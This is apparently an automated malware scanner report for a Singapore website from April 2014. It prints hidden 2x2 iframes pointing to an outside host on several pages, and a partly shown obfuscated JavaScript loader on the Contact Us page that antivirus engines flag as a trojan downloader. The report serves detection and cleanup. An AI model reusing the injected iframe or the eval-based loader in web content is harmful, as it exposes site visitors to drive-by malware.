New scan:

Malware Scanner report for thebackyard.com.sg

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/4/4
4 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://thebackyard.com.sg/
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2014 07:01:02 GMT
Accept-Ranges: bytes
ETag: "da948a1a301ece1:8a456"
Server: Microsoft-IIS/6.0
Content-Length: 3324
Content-Location: http://thebackyard.com.sg/index.htm
Content-Type: text/html
Last-Modified: Mon, 11 Mar 2013 08:11:59 GMT
X-Powered-By: ASP.NET
clean
http://thebackyard.com.sg/index.htm
200 OK
Content-Length: 3324
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://newridgetech.com/hepn.html?i=853909

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/hepn.html?i=853909>

http://thebackyard.com.sg/Index.htm
200 OK
Content-Length: 3324
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://newridgetech.com/hepn.html?i=853909

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/hepn.html?i=853909>

http://thebackyard.com.sg/Gallery.htm
200 OK
Content-Length: 3324
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://newridgetech.com/hepn.html?i=853909

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/hepn.html?i=853909>

http://thebackyard.com.sg/Contact%20Us.htm
200 OK
Content-Length: 6191
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ss=String.fromCharCode;asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x68,0x66,0x78,0x6a,0x6f,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x68,0x66,0x78,0x6a,0x6f,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x77,0x77,0x
... 1654 bytes are skipped ...
x65,0x6e,0x74,0x2e,0x67,0x65,0x74,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x42,0x79,0x49,0x64,0x28,0x27,0x68,0x66,0x78,0x6a,0x6f,0x27,0x29,0x2e,0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,0x6c,0x64,0x28,0x68,0x66,0x78,0x6a,0x6f,0x29,0x3b,0xd,0xa,0x20,0x20,0x20,0x20,0x7d,0xd,0xa,0x7d,0x29,0x28,0x29,0x3b];try{document.body|=1}catch(gdsgsdg){zz=3;dbshre=28;if(dbshre){vfvwe=0;try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["eval"];}s="";for(i=0;i-491!=0;i++){if(window.document)s+=ss(asgq[i]);}z=s;e(s);}}

Antivirus reports:

AntiVir
JS/iFrame.dcu
Avast
JS:Iframe-AKP [Trj]
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Trojan.Crypt.MB
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.409
Kaspersky
Trojan-Downloader.JS.Iframe.dcu
MicroWorld-eScan
JS:Trojan.Crypt.MB
Fortinet
JS/Iframe.W!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Redirector.bjrusl
F-Secure
JS:Trojan.Crypt.MB
GData
JS:Trojan.Crypt.MB
BitDefender
JS:Trojan.Crypt.MB

http://thebackyard.com.sg/FAQ.htm
200 OK
Content-Length: 3324
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://newridgetech.com/hepn.html?i=853909

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/hepn.html?i=853909>

http://thebackyard.com.sg/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: thebackyard.com.sg

Result:
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2014 07:01:02 GMT
Accept-Ranges: bytes
ETag: "da948a1a301ece1:8a456"
Server: Microsoft-IIS/6.0
Content-Length: 3324
Content-Location: http://thebackyard.com.sg/index.htm
Content-Type: text/html
Last-Modified: Mon, 11 Mar 2013 08:11:59 GMT
X-Powered-By: ASP.NET

...3324 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thebackyard.com.sg
Referer: http://www.google.com/search?q=thebackyard.com.sg

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=thebackyard.com.sg

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thebackyard.com.sg/

Result: thebackyard.com.sg is not infected or malware details are not published yet.